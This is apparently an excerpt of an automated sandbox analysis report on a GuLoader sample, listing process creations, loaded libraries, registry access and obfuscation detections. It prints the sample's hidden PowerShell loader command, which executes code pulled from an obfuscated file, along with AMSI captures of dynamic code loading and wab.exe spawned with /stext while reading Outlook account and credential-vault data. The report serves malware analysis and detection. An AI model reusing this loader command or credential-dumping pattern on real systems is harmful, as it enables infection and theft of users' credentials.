              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424
              Source: C:\Users\user\Desktop\Uundgaaelige.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"Jump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Uundgaaelige.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\Uundgaaelige.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Uundgaaelige.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: qm.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000007.00000002.216299419557.0000000009A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Chimbley $Histolaborantomlrken $Catechizing), (Headwark @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Utjets = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Recolors)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Admiralsuniform, $false).DefineType($Kjortelen,
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\Uundgaaelige.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)
              Source: C:\Users\user\Desktop\Uundgaaelige.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales)Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D92DCD push ebx; ret 7_2_04D92DEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D9EAD4 pushfd ; ret 7_2_04D9EAE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D9EAFD pushfd ; ret 7_2_04D9EAE1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08E31A8B pushfd ; retn 089Eh7_2_08E31E29
